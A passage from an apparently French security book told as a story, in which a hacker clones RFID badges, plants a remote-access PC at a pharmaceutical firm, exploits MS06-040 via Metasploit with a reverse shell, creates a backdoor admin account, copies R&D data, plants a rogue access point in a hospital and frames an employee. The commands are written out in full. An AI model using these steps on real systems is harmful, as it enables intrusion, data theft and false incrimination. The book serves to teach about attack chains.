doit tre moins de 20 centimtres de la carte de Linda pour que le scanner puisse rcuprer les informations. Comme celui-ci est dans la poche infrieure gauche de son blouson, il sait quil la plac au meilleur endroit. Phnix se lve et va chercher une chaise pour Linda en esprant que cela le rapprochera sufsamment delle. Lorsquil passe derrire Linda et tire la chaise, il attend le "bip" de son scanner. Il nentend rien, ce qui signie que la copie nest pas effectue. Aprs avoir cout Linda expliquer pendant trente minutes quel point Alki est une entreprise gniale, Phnix lui fait savoir quil est intress et quil voudrait y rchir un peu plus. Alors que Linda se lve et que Phnix en fait autant pour lui serrer la main, elle tend ses bras pour une accolade. Phnix se dit : "Ouh la, cest un peu inappropri quand mme !" Mais son imagination est interrompue par un bip. Bingo ! La carte est copie. Linda regarde Phnix, tonne, et lui demande : "Quest-ce que ctait que a ? Oh, juste mon tlphone portable qui me signale que jai oubli de le charger hier, rpond Phnix calmement. Oui, jai souvent ce problme aussi", rit Linda. Alors que Phnix quitte le caf et regarde par-dessus son paule Linda partir dans lautre direction, il pense : "Ouah, ce chu truc a vraiment march !" Une heure plus tard, Phnix est peine entr dans son appartement quil sort le scanner de sa poche et le branche sur le port srie de son portable. Phnix ouvre un terminal sur son portable et lance le script Python pour y extraire le contenu de lappareil. Il branche alors son lecteur de cartes et y place une carte vierge. Il lance alors un autre script Python qui crit la carte extraite sur la carte vierge. Au mme moment, Kate appelle. Phnix coute ses plaintes propos de son boulot et raccroche rapidement. Il dbranche son quipement, teint son portable et va boire un verre dans un bar voisin. Il est maintenant prt accepter linvitation de Linda de visiter le complexe. Cela sera crucial : il doit savoir ce que la carte daccs de Linda lui ouvrira comme portes. Il prvoit aussi davoir son scanner de RFID sur lui pour pouvoir rcuprer dautres donnes de cartes sil en a loccasion. Ce qui suit est, en provenance du projet open-source ridiot.org, le programme permettant de lire la puce RFID :
$ ./readtag.py readtag v0.1b (using RFIDIOt v0.1p) Reader: ACG MultiISO 1.0 (serial no: 34060217) ID: E01694021602D1E8 Data:

110

Chanes dexploits

Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block Block

00: 01: 02: 03: 04: 05: 06: 07: 08: 09: 0a: 0b: 0c: 0d: 0e: 0f: 10: 11: 12: 13: 14: 15: 16: 17: 18: 19: 1a: 1b: 1c: 1d: 1e: 1f: 20: 21: 22: 23: 24:

6D40F80000000000 FFF0782201E87822 00000083000000B3 000000E300000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000

Le lendemain, alors que Phnix attend Linda, il est gagn par la nervosit. Il la rprime lorsquil voit sa chevelure blonde et sa silhouette lgante passer le coin de la rue pour entrer dans le caf. Linda sassied aprs ses salutations ptillantes habituelles et Phnix lui indique immdiatement quil est intress et quil aimerait visiter le complexe quand cela lui conviendra. Ravie de cette nouvelle, Linda propose rapidement : "Et pourquoi pas demain ?" Phnix accepte et ils planient un rendez-vous pour 15 heures. Lorsque Phnix entre dans le campus et se dirige vers lentre principale, il remarque que cette partie du complexe ne requiert pas dautorisation pour entrer. Alors quil se

Chapitre 4

Espionnage industriel

111

dirige vers le bureau de la scurit pour demander Linda, il est surpris de la voir sortir de lun des ascenseurs. Avec son large sourire habituel, elle se dirige vers Phnix : "Bonjour, dit-elle dune voix joyeuse. Bonjour, rpond Phnix. Linda lui serre la main et le conduit un des ascenseurs. Je crois que nous allons commencer par le service informatique, sexclame-t-elle. On improvisera pour le reste." Phnix regarde lindicateur dtage de lascenseur et remarque quils sont dj au septime tage. Ils sortent de lascenseur devant un panneau marqu Service Informatique. Tandis que Phnix et Linda font le tour du service, Phnix remarque que la carte daccs de Linda ouvre toutes les portes de ltage. Il linterroge propos de sa carte et sur les accs quil aurait sil entrait dans lentreprise. Linda lui explique quelle-mme et cinq autres personnes ont des cartes qui ouvrent presque toutes les portes du campus. "Lune de ces cartes est attribue au gardien prestataire qui entretient le btiment la nuit", ajoute-telle. Elle dit Phnix que sa carte lui naura pas le mme type daccs, mais que sil travaillait dur, il pourrait avoir un jour le mme niveau de conance et daccs dans lentreprise. Phnix ricane intrieurement ce commentaire. Pendant quils visitent ltage, Phnix sassure de noter chaque personne quil rencontre et lordre dans lequel il rencontre ces personnes. Il note galement leur position et leur titre. Il a en effet modi le scanner RFID pour lui adjoindre une antenne plus puissante. Il peut maintenant lire une carte un petit mtre de distance. Lorsquil est prsent aux gens, il sassure quil est sufsamment prs pour scanner les badges car ils lont tous bien en vue. Phnix se dit : "Il doit y avoir une politique dentreprise idiote qui impose que les badges soient visibles." Une fois la visite termine, Phnix remercie Linda et lui promet de lappeler plus tard dans la semaine. Il rentre chez lui et commence transfrer les donnes des cartes quil a scannes et associer les donnes aux noms et titres de la liste quil a cre. En tout, il a rcupr quinze identits. Il tiquette les cartes vierges quil a achetes. Phnix est dsormais prt effectuer la tche ardue de rcuprer les donnes demandes par M. Dobbs. Il envisage dentrer dans le btiment et daccder au local rseau. Il pourra ensuite accder au btiment grce aux autorisations de quelquun dautre, trouver lendroit o sont stockes les donnes de recherche sensibles, en faire des copies et sortir. Puis il lancera une attaque sur lhpital voisin en faisant remonter toutes les pistes sa cible, Alki Pharmaceutique.

112

Chanes dexploits

Phnix dcide dutiliser les identits de Linda et de lun de ses ingnieurs systme, Arnaud, comme points dentre et cible. Il embarque quelques objets de son bureau. Parmi ces objets se trouvent un miniportable qui contient le systme dexploitation hte Windows XP, VMWare pour lancer une ISO personnalise du live CD Knoppix, un modem 3G intgr et une carte rseau Ethernet intgre. Le plan de Phnix est daccder au btiment, dy brancher son portable et de prier les cyber-dieux pour obtenir une adresse IP via DHCP (Dynamic Host Conguration Protocol, protocole de conguration dynamique des htes). Puis il se connectera Internet grce son modem 3G, activ par les informations de compte fournies par M. Dobbs. Il se connectera ensuite au service GoToMyPC sur lequel il a ouvert un compte dessai avec une adresse Hotmail utilisant ladresse de Linda Alki comme adresse secondaire. Lorsque vous ouvrez un compte Hotmail, vous pouvez indiquer une adresse secondaire pour les rinitialisations de mot de passe et autres oprations administrateur. Phnix cre le compte au nom dArnaud et lui associe ladresse Alki de Linda. Ainsi, si le compte Hotmail fait lobjet dune enqute, et si lenquteur va jusqu demander un mandat un juge pour obtenir les informations associes au compte, il supposera que le compte a t ouvert par Linda, ce qui limpliquera dans lattaque. Phnix se rend compte que cest une opration risque, mais son temps est compt. Par ailleurs, si quelquun rassemble toutes les pices du puzzle, ce sera une preuve de plus dsignant une attaque venant de lintrieur. Phnix sait quil vaut mieux entrer entre 19 et 20 heures. Cest lheure laquelle les gardiens externes commencent leur service. Il prvoit aussi de prendre son scanner RFID : cloner la carte daccs du gardien serait un bonus intressant. Il est 18 heures. Phnix retourne au complexe Alki. Il entre par la grande porte. Un regard rapide au bureau de la scurit lui conrme que le type qui sy trouve se che des entres et sorties. Il ne daigne mme pas lever le nez du magazine quil est en train de lire. "Il a probablement lhabitude de voir beaucoup de monde", se dit Phnix. Il arrive aux ascenseurs et appuie sur le bouton pour en appeler un. Immdiatement, les portes les plus proches de lui sonnent et souvrent. Phnix entre dans lascenseur et appuie sur le bouton du septime tage. Il est surpris de voir que rien ne se passe. Aprs un bref instant de rexion, Phnix sort le clone de la carte de Linda de sa poche et lapproche du lecteur de cartes de lascenseur. La petite lumire rouge du lecteur passe au vert. Phnix appuie de nouveau sur le bouton 7, les portes se ferment et lascenseur monte. Phnix sarrte au septime tage et se dirige vers le local rseau. Il arrive la porte, passe le clone de la carte de Linda, et lindicateur passe du rouge au vert. Phnix saisit la poigne de la porte et la tourne : la porte souvre. Phnix se dit : "Je suis

Chapitre 4

Espionnage industriel

113

toujours surpris que ces gens naient pas de systme biomtrique en place." Phnix se dirige vers une armoire de commutateurs. Les administrateurs ont group et tiquet les armoires de faon logique. Il identie rapidement le groupe de commutateurs tiquet R&D. Cinq ports sont libres. Phnix sort un cble Ethernet CAT6 gris de son sac, le branche sur un port libre, branche lautre extrmit son miniportable et allume ce dernier. Phnix dmarre son portable. Windows XP se charge. Il se connecte, lance VMWare et y dmarre un CD de Knoppix avec tous ses outils prcompils. Phnix revient son systme hte (Windows XP), ouvre une invite de commande et y tape ipconfig /all. La sortie sur son cran lui indique quil a obtenu une adresse du serveur DHCP. Il retourne sous VMWare et voit que Knoppix a dmarr avec succs. Il ouvre une console et tape ifconfig. Knoppix a aussi obtenu ladresse IP 10.0.0.6. Il retourne au systme hte, dmarre le logiciel de connexion de son modem 3G et son GoToMyPC prinstall lui indique quil est connect Internet. Phnix grimpe sur une chaise, pose son mini-PC au-dessus de tous les commutateurs, connecte son alimentation sur une des nombreuses prises libres, attrape son sac et se dirige vers la porte. Alors quil sapprte sortir de la pice, il se retourne pour vrier que rien ne semble suspect. Phnix remarque trois points daccs Linksys qui tranent sur une caisse. Tous ont une tiquette dinventaire dAlki. Phnix en jette un dans son sac dos et reprend son chemin en pensant : "De toute faon, ils ne sen apercevront mme pas, cet endroit est un vrai foutoir." Il sort et retourne lascenseur. Quelques minutes plus tard, il se trane pniblement dans la rue devant le btiment qui mne la gare. Phnix emprunte les escaliers et arrive sur le quai juste temps pour avoir le train. Une fois assis, il se rend compte que ladrnaline et lanxit vont lempcher dattendre dtre la maison pour vrier son installation. Phnix ouvre son sac, sort son portable et louvre. Lcran sanime rapidement tandis que lordinateur sort dhibernation. Phnix saisit son nom dutilisateur et son mot de passe. Il insre sa carte 3G dans le port PC Express et double-clique sur licne de connexion sans-l du bureau. Le logiciel client se lance et Phnix clique sur le bouton Connexion. Le processus dauthentication semble se mettre en route ; lindicateur nit par passer au statut Connect. Phnix dmarre Firefox et se connecte www.gotomypc.com. Il saisit son nom dutilisateur (ladresse Hotmail) et son mot de passe. Une fois identi, il clique sur le bouton Computers et laisse chapper un petit cri en voyant que la machine quil a mise en place est en ligne. Phnix ferme son portable et le range dans son sac.

114

Chanes dexploits

Excuter les attaques Lorsque Phnix rentre chez lui trente minutes plus tard, il se met rapidement au travail. Il dmarre son portable et branche lalimentation. Au moment o lcran sallume, Phnix fait une courte pause pour rchir aux erreurs quil aurait pu commettre. Mais il se raisonne vite : "La seule preuve de ma prsence serait que quelquun rcupre le miniportable chez Alki avant que je ne puisse le rcuprer moi-mme." Il est convaincu quil rcuprera le portable bien avant que quiconque Alki ne se rende compte de la situation. Il connecte son portable au cble Ethernet qui trane sur son bureau et rafrachit la page GoToMyPC quil a ouverte dans le train. Celle-ci lui indique quil a t dconnect en raison de son inactivit. Phnix saisit de nouveau ladresse lectronique et le mot de passe. Une fois authenti, il reclique sur le bouton Computers et est ravi de voir sa machine dattaque en ligne et en attente de sa connexion. Phnix clique sur le bouton Connect, saisit son code daccs et, comme par magie, le bureau de son mini-PC apparat sur lcran. Phnix accde immdiatement au VMWare qui tourne sur le miniPC et la console quil avait ouverte dans la machine virtuelle. Il se met aussitt au travail avec Nmap. Phnix tape la commande suivante :
nmap 10.0.0.0/24

Les rsultats partiels sont illustrs ci-aprs :


Starting Nmap 4.60 ( http://nmap.org ) at 2008-12-06 19:38 GMT All 1715 scanned ports on 10.0.0.6 are closed Interesting ports on 10.0.0.14: Not shown: 1700 closed ports PORT STATE SERVICE 25/tcp open smtp 53/tcp open domain 80/tcp open http 100/tcp open newacct 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 1029/tcp open ms-lsa 1030/tcp open iad1 1032/tcp open iad3 1033/tcp open netinfo 1433/tcp open ms-sql-s 12345/tcp open netbus MAC Address: 00:0C:29:C0:BA:A0 Nmap done: 256 IP addresses (7 hosts up) scanned in 41.691 seconds

Chapitre 4

Espionnage industriel

115

Phnix obtient exactement ce quil voulait : toutes les machines du rseau et les ports sur lesquels elles coutent sont dans la liste. Phnix y trouve une machine intressante ladresse 10.0.0.14. Phnix se dit : "Je nai pas le temps de faire dans la discrtion ou la nesse. De toute faon, de ce que jai vu, ces types ne sauront jamais ce quil sest pass." Ses penses quant la ngligence des administrateurs sont interrompues par ce quil aperoit lcran. Il voit, dans les ports ouverts, un hte qui lui semble familier. Cela lui revient : pendant sa recherche dinformations, Phnix a dcouvert que le serveur du logiciel de R&D fonctionnait sur le port 12345. Il vient probablement didentier le serveur qui contient les donnes sensibles quil doit obtenir. Phnix passe ltape suivante logique et lance Nmap sur lhte quil suspecte de contenir les donnes sensibles. Il doit maintenant identier le systme dexploitation qui fonctionne sur le serveur. Il ne cherche pas vraiment tre discret lheure quil est, mais son instinct naturel revient et il choisit de lancer la commande sur un port unique. Il choisit le port intressant identi dans le rsultat prcdent et lance la commande suivante, dans laquelle -A indique Nmap de dtecter le systme dexploitation (sous Linux) et -p dnit un port :
nmap -A 10.0.0.14 -p 12345

Il obtient les rsultats suivants :


Starting Nmap 4.60 ( http://nmap.org ) at 2008-12-06 19:54 GMT Interesting ports on 10.0.0.14: PORT STATE SERVICE VERSION 12345/tcp open netbus NetBus trojan 1.70 MAC Address: 00:0C:29:C0:BA:A0 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Microsoft WindowsXP|2003 OS details: Microsoft WindowsXP Professional SP2 or Windows Server 2003, Microsoft WindowsXP SP2 Network Distance: 1 hop Service Info: OS: Windows OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/. Nmap done: 1 IP address (1 host up) scanned in 15.744 seconds

La dtection du systme dexploitation rduit les possibilits Windows XP SP2 ou Windows 2003 Server. Phnix retourne son scan de ports prcdent et examine les autres ports ouverts sur lhte 10.0.0.14. Il voit que les ports du service dannuaire sont ouverts et suppose quil doit sagir de Windows 2003 Server. Phnix se souvient avoir lu un message sur le forum du fournisseur du logiciel indiquant que les connexions se

116

Chanes dexploits

coupaient rgulirement sans raison apparente. La solution semblait tre (daprs le l de discussion) de supprimer le Service Pack 1 de linstallation de Windows 2003 Server. Phnix espre que le SP1 est toujours dsinstall. Au vu des commentaires que Linda faisait sur son service informatique, Phnix nest pas tonn que la suppression des Service Packs ait t considre comme une solution acceptable. Phnix rchit quelques instants. Il ouvre la page http://www.microsoft.com/france/securite/ et cherche les failles combles par les diffrents Service Packs. Il nit par trouver le bulletin de scurit MS06-40, dcrivant une faille qui tire avantage de netapi32.dll et exploitable sur Windows 2003 Server sans SP1 et sans correctifs de scurit. Phnix dmarre Metasploit et saisit la commande suivante, qui lui afche une liste des exploits disponibles :
show exploits windows/smb/ms04_011_lsass Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow windows/smb/ms04_031_netdde Microsoft NetDDE Service Overflow windows/smb/ms05_039_pnp Microsoft Plug and Play Service Overflow windows/smb/ms06_025_rasmans_regMicrosoft RRAS Service RASMAN Registry Overflow windows/smb/ms06_025_rras Microsoft RRAS Service Overflow windows/smb/ms06_040_netapi Microsoft Server Service NetpwPathCanonicalize Overflow windows/smb/ms06_066_nwapi Microsoft Services MS06-066 nwapi32.dll windows/smb/ms06_066_nwwks Microsoft Services MS06-066 nwwks.dll windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption windows/smb/msdns_zonename Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB) windows/smb/psexec Microsoft Windows Authenticated User Code Execution

Phnix voit quil existe un exploit dvelopp pour tirer parti de cette vulnrabilit. Il tape la commande suivante pour charger lexploit :
use windows/smb/ms06_040_netapi

Linvite de commande de Metasploit change pour indiquer que lexploit SMB est charg.
msf exploit(ms06_040_netapi) >

Chapitre 4

Espionnage industriel

117

Phnix fait suivre cette commande dune srie dautres commandes qui chargent un exploit qui, sil fonctionne, lui donnera un accs en ligne de commande au serveur cible. Il dnit galement des paramtres tels que ladresse IP cible et celle de la machine attaquante, et ordonne au programme de lancer lexploit. Il saisit les commandes suivantes :
set PAYLOAD generic/shell_reverse_tcp [entre] set RHOST 10.0.0.14 [entre] set LHOST 10.0.0.6 [entre]

Une fois ces paramtres saisis, linvite de commande Metasploit de Phnix ressemble ce qui suit :
msf > use windows/smb/ms06_040_netapi msf exploit(ms06_040_netapi) > set PAYLOAD generic/shell_reverse_tcp PAYLOAD => generic/shell_reverse_tcp msf exploit(ms06_040_netapi) > set RHOST 10.0.0.14 RHOST => 10.0.0.14 msf exploit(ms06_040_netapi) > set LHOST 10.0.0.6 LHOST => 10.0.0.6

Phnix tape Entre aprs avoir saisi la commande exploit et obtient lcran suivant :
Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>

Phnix a obtenu un accs au systme cible via la ligne de commande. Il est maintenant connect avec les privilges Systme Local, soit plus de droits encore que le compte Administrateur. Phnix sent lexcitation familire dun exploit russi. Il commence immdiatement se crer une porte dentre pour ses propres besoins. Il cre un compte et lajoute au groupe dadministrateurs locaux avec les commandes suivantes :
C:\WINDOWS\system32>net user linda alki$$ /ADD La commande sest termine correctement. C:\WINDOWS\system32>net localgroup administrateurs linda /ADD La commande sest termine correctement. C:\WINDOWS\system32>

La premire commande, net user, cre un compte linda avec le mot de passe alki$$. La seconde commande, net localgroup, ajoute le compte linda au groupe des administrateurs locaux. Phnix voit que les deux commandes se sont termines avec succs. Il essaie donc immdiatement de se connecter au serveur. Il sait, grce au scan Nmap, que le bureau

118

Chanes dexploits

distant est activ. Il choisit donc de se connecter par ce biais. Il ouvre le menu Dmarrer > Tous les programmes > Accessoires de son ordinateur et clique sur licne Connexion Bureau distance. Il saisit ladresse IP du serveur R&D et le nom dutilisateur quil vient de crer (linda). La Figure 4.3 illustre la connexion au bureau distance.

Figure 4.3
Connexion au bureau distance.

Aprs avoir cliqu sur le bouton Connexion, Phnix saisit le mot de passe quil a attribu (alki$$) et il est accueilli par le bureau du serveur R&D. Il clique immdiatement sur Poste de travail en haut de lcran pour voir comment sont agences les partitions. Il ny en a que deux : C et D. Un examen rapide conrme la premire impression de Phnix. Cest une conguration classique : C pour le systme et les programmes, D pour les donnes sensibles. Le lecteur D est une partition de 120 Go. Cela prendra un certain temps, mais Phnix sait quil doit copier les donnes vers le disque externe connect lordinateur quil a mis en place chez Alki. Au vu de la structure des rpertoires, il semble que tous les chercheurs partagent des informations en les rcuprant et

Chapitre 4

Espionnage industriel

119

en les envoyant au mme endroit. Le tout ressemble un amas de documents, rsultats de tests, formules, etc. Il semble que le logiciel onreux achet par Alki ne soit rien de plus quun systme de gestion de documents un peu complexe. Phnix rduit lcran du bureau distance et revient son systme hte. Il ouvre le Poste de travail et partage le disque externe sur le rseau. Il active toutes les permissions pour tous les utilisateurs. Il revient au bureau distance, ouvert sur le serveur R&D. Il clique sur Dmarrer > Excuter et saisit ladresse IP de sa machine dattaque ( laquelle il est connect via GoToMyPC) et une fentre de lExplorateur souvre, lui prsentant son disque externe. Phnix se dit : "La copie va tre longue. a serait bien plus rapide si je pouvais copier directement sur la machine dattaque." Ce nest cependant pas possible : lordinateur quil utilise ces ns ne dispose que de 30 Go de disque dur. Phnix sait que Windows a souvent des problmes pour copier de gros volumes de donnes via un partage rseau. Il lance donc Dmarrer > Tous les programmes > Accessoires > Outils systme > Utilitaire de sauvegarde. Il lance lassistant de sauvegarde, choisit le lecteur D entier comme source, et le disque externe attach son portable comme destination. Il accepte le reste des paramtres par dfaut et clique sur le bouton Termin. La sauvegarde commence et afche rapidement une estimation de la dure totale de lopration : neuf heures. Phnix soupire de soulagement et commence rchir lattaque quil pourrait lancer contre lhpital en face dAlki. Cest ce moment que lexistence du point daccs quil a vol chez Alki lui revient en mmoire. "Je nai qu aller linstaller quelque part sur le rseau de lhpital. Ensuite je pourrai faire quelques dgts", se dit-il. Organiser la panne lhpital Phnix a neuf heures tuer pendant le transfert des donnes du service R&D, il dcide donc de retourner dans la zone dAlki et dy mener quelques recherches. Il prvoit de visiter lhpital et ses alentours pour valuer la difcult de lattaque quil doit y lancer. Il est un peu plus de 21 heures, ce qui rduit le risque dembouteillages. Il dcide donc dy aller en voiture. Alors que Phnix se dirige vers sa voiture, son portable "spcial" vibre dans sa poche. Phnix plonge la main dans sa poche et attrape le tlphone en montant dans sa voiture. Il louvre et rpond : "All ? Comment se prsente le projet ? demande M. Dobbs schement.

120

Chanes dexploits

Jai presque ni, rpond Phnix. Je suis impressionn, a ne fait que quelques jours, dit M. Dobbs dun ton lgrement plus relch. Il faut dire que vous ne mavez pas vraiment laiss le choix avec votre message menaant. Je napprcie pas vraiment les menaces lencontre de ma copine dailleurs. Phnix sent le sang lui monter aux joues. Calme-toi, je ntais pas srieux, lui rpond M. Dobbs. Par contre, je suis srieux sur le montant quon te paie." Linstinct de Phnix lui soufe que M. Dobbs tait on ne peut plus srieux. "Comme vous voulez, rpond Phnix. Je devrais avoir termin dans quelques jours maximum. Si vous me donnez un numro de tlphone, je vous appellerai quand". Phnix entend un clic, suivi de la tonalit. Dobbs lui a raccroch au nez. "Quel crtin pompeux !" sexclame-t-il en passant la premire et en sortant de sa rsidence. Il ne lui faut que quinze minutes pour arriver lhpital. Phnix a embarqu le point daccs dAlki et un autre mini-PC dans un sac. Il ne prvoit pas vraiment de les mettre en place ce soir, mais il refuse de laisser passer lopportunit si elle se prsente. Phnix entre dans lhpital par la salle dattente des urgences. Pendant quil la traverse, il remarque quelle est pleine de gens atteints de toutes sortes de maux et de gens qui attendent dautres personnes. "Ils ont lair compltement dbords ici, il me sera peuttre trs facile de mettre mon matriel en place", pense-t-il aussitt. Phnix passe devant laccueil et ignore linrmire en train de se faire passer un savon par un type en colre qui prtend attendre un docteur depuis six heures. Phnix continue dans le couloir et se dit que linrmire doit avoir un boulot trs pnible. En arrivant au bout du couloir, il tourne droite sans hsiter, comme sil savait exactement o il allait. Il se souvient avoir lu dans un livre dingnierie sociale quune des celles de lintrusion physique consiste agir comme si on tait parfaitement sa place. Alors quil continue de marcher une allure normale, il remarque une porte avec un panneau NE PAS UTILISER CETTE CHAMBRE, EN TRAVAUX. Il sarrte et regarde la porte quelques instants avec curiosit. Puis il attrape la poigne et la tourne. La porte souvre. Tout le carrelage a t enlev du sol et le bton est nu. part cela, la chambre ressemble toutes les chambres devant lesquelles il est pass. Phnix parcourt la pice du regard et remarque trois prises Ethernet sur le mur prs de la tte dun des deux lits de la chambre. Instinctivement, il sort son portable de son sac et le branche. Il est surpris de voir la diode de connexion de sa carte Ethernet sallumer

Chapitre 4

Espionnage industriel

121

en vert et commencer clignoter au rythme de lactivit du rseau. "Il est impossible quils aient laiss ces prises actives sils font des travaux dans cette chambre." Phnix baisse la tte et voit deux prises lectriques places 60 centimtres sous les prises rseau. Il branche lalimentation de son portable. La diode de charge orange de son portable sallume immdiatement. "Il y a encore de llectricit." Phnix se rappelle alors que les ouvriers qui retirent le carrelage du sol ont besoin dquipement, qui luimme a besoin dlectricit. a nexcuse cependant pas les ports Ethernet actifs. "Je me demande sil y a un rglement quelconque pour ce genre de situation", se demande Phnix. Il se connecte au portable, lance une invite de commande et saisit ipconfig /all. Il est surpris de voir quil a reu une adresse IP via le serveur DHCP. Phnix sort rapidement un stylo de son sac et griffonne les informations rseau sur un bout de papier. Puis il sort son point daccs, dbranche le cble Ethernet de son portable et le branche sur le port 2 du point daccs. Il sort ensuite lalimentation du point daccs et la branche sur une des prises lectriques. Le point daccs sanime et toutes ses diodes clignotent, indiquant quil est en train de dmarrer. Lorsquil a ni de dmarrer, Phnix appuie sur le bouton de rinitialisation avec un stylo jusqu ce que la diode dalimentation commence clignoter. Il relche alors le bouton, dbranche lalimentation et la rebranche immdiatement. Il vient de rinitialiser le point daccs ses paramtres de sortie dusine.
Points daccs non autoriss De nombreuses entreprises ont mis en place des politiques qui interdisent la connexion de points daccs sans-l, que ce soit pour des raisons nancires, techniques ou de manque de personnel, mais peu dentre elles vrifient effectivement quaucun point daccs nest connect leur rseau de production.

Une fois le point daccs redmarr, Phnix dmarre Firefox sur son portable et tape dans la barre dadresse lIP par dfaut de conguration du point daccs :
http://192.168.1.254

Phnix arrive la page de conguration du point daccs Linksys. Il lui indique dutiliser le DHCP et congure le ct sans-l avec ladresse quil avait rcupre avec son portable grce au DHCP de lhpital. Il connecte alors son portable une autre prise du mur et attend une autre adresse du DHCP. Cette fois, Phnix a branch une carte Ethernet PCMCIA (Personal Computer Memory Card International Association) son

122

Chanes dexploits

portable. Il ne veut pas que le serveur DHCP lui renvoie ladresse quil vient dassigner au point daccs. Aprs avoir rcupr une adresse, Phnix ne perd pas de temps pour lancer une ligne de commande et lancer Nmap sur le sous-rseau avec la commande suivante :
nmap 10.10.10.0/24

Voici un extrait des rsultats :


Starting Nmap 4.60 ( http://nmap.org ) at 2008-12-11 19:38 GMT All 1715 scanned ports on 10.10.10.69 are closed Interesting ports on 10.10.10.70: Not shown: 1700 closed ports PORT STATE SERVICE 25/tcp open smtp 53/tcp open domain 80/tcp open http 100/tcp open newacct 110/tcp open pop3 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 1029/tcp open ms-lsa 1030/tcp open iad1 1032/tcp open iad3 1033/tcp open netinfo 1433/tcp open ms-sql-s MAC Address: 00:0C:29:C0:BA:A0 Nmap done: 256 IP addresses (12 hosts up) scanned in 29.462 seconds

Phnix examine la sortie et saperoit que seuls douze htes rpondent. "Cest peu", se dit-il. Puis il rchit : "a ne doit couvrir que ltage des urgences." Il dcide quil en sait assez pour linstant. Il lance une dernire commande Nmap pour dtecter les systmes dexploitation de tous les htes du rseau et crit les rsultats dans un chier texte cach dans un ADS (Alternate Data Stream, ux de donnes alternatif) sur le disque dur. Il lance pour cela la commande suivante :
nmap -A 10.10.10.0/24 > c:\OSdetect.txt:ads.txt

Il sait quen crivant le chier dans un ADS cela le rendra presque indtectable. ADS fait partie du systme de chiers NTFS depuis Windows NT 3.1. Selon Microsoft, il a t dvelopp pour des raisons de compatibilit avec le systme HFS (Hierarchical File System, systme de chiers hirarchique) des Macintosh. Les systmes de chiers sous Mac enregistrent un chier en deux parties : la partie ressources et la partie donnes.

Chapitre 4

Espionnage industriel

123

La partie donnes contient les donnes relles du chier et la partie ressources indique au systme dexploitation comment utiliser les donnes. Sous Windows, on utilise simplement les extensions de noms de chiers. Mais, pour que les machines Windows soient compatibles avec les Mac, Microsoft a dvelopp les ADS. Les ADS sont quivalents aux ux de ressources sous Mac. Mais on peut crire dans ces ux grce certaines commandes, comme vient de le faire Phnix. Cest un excellent moyen de cacher des donnes, mme du plus paranoaque des administrateurs systme. Mme sil prvoit de laisser le portable o il est, il veut au moins donner limpression quil essayait de dissimuler les preuves de ses agissements. Phnix a mis sur le portable toutes sortes de virus, un kit de dveloppement de virus et tous les outils dont il aura besoin pour effectuer une reconnaissance du rseau de lhpital et lancer son attaque. Il a aussi visit divers sites web pirates, vri le faux compte Hotmail quil a cr au nom de Linda et la utilis pour envoyer des courriers lectroniques divers domaines connus pour hberger des pirates et les aider dans diverses activits illgales. Dans ses messages, il demandait de laide sur diverses activits comme le scan de rseau, la cration de virus et lexploitation dordinateurs sur lesquels les mises jour de scurit ne sont pas appliques. Pour persuader les gens de laider, il a ajout des photos de vacances que Linda avait postes sur son site web, o on la voit en bikini. Il a aussi envoy la photo que Linda avait sur sa che personnelle Alki. Les pirates qui ont offert de laider lui ont demand des informations pour lidentier et pour prouver quelle ntait pas de la police. Se faisant passer pour Linda, Phnix a volontiers accept. En fait, Phnix sattendait ce type de requte. Il suppose que, lorsquil aura lanc lattaque, le service informatique de lhpital ou des consultants externes niront par trouver le portable. Ils trouveront alors aussi le point daccs sansl, muni de son tiquette dinventaire dAlki. Ils effectueront sans aucun doute des recherches sur le portable et dcouvriront les visites aux sites pirates, les outils de piratage et laccs au compte Hotmail. Phnix a prcisment congur lordinateur pour quil se souvienne de lidentiant et du mot de passe du compte sur hotmail.com. Ainsi, lorsque les enquteurs regarderont lhistorique Internet et visiteront Hotmail, ils pourront se connecter automatiquement et voir toutes les preuves, les photos et les demandes daide. Et tout pointera vers Alki et vers Linda. Phnix est dsol pour Linda. Mais il se rassure en se disant que si les enquteurs font leur travail proprement, quils analysent correctement la situation et quils rclament les informations de connexion Hotmail et au fournisseur daccs qui gre le point daccs du caf, ils verront que Linda ntait pas au caf pendant les jours et heures o Phnix a utilis le portable pour visiter les sites pirates et demander de laide. Cela sera cependant difcile prouver car le caf est pratiquement la porte dAlki.

124

Chanes dexploits

Si sufsamment de ressources, dargent et de temps sont consacrs lenqute, Linda devrait pouvoir sen sortir. Mais il y a de fortes chances que lenqute ne soit pas aussi pousse. Elle sera probablement licencie, et Alki seffondrera probablement sous la pression et proposera un arrangement lamiable sans aller jusquaux tribunaux ni payer une enqute approfondie. Phnix a pay le portable en liquide et laiss de fausses informations au magasin o il la achet. Si les enquteurs se donnent la peine dassocier les numros de srie aux adresses MAC des portables vendus par le magasin, ils seront lancs sur la fausse piste du personnage ctif ayant achet le portable. Phnix vrie une fois de plus que le Bureau distance est activ et que le portable peut communiquer avec le point daccs. Il vrie ensuite quil peut lancer un ping un des htes du scan Nmap. Ces deux tentatives sont couronnes de succs et Phnix place le portable sur une armoire de fournitures mdicales, cache le point daccs derrire et se dirige vers la porte. Alors quil sort de la pice et referme la porte derrire lui, il est surpris par une inrmire qui sadresse lui sur un ton sec : "Que faites-vous dans ce couloir ? Je vous ai dit que vous ne pouviez pas dormir ici !" Phnix regarde la femme, lair tonn. Elle enchane et crie : "Et avant que vous ne demandiez, non, vous ne 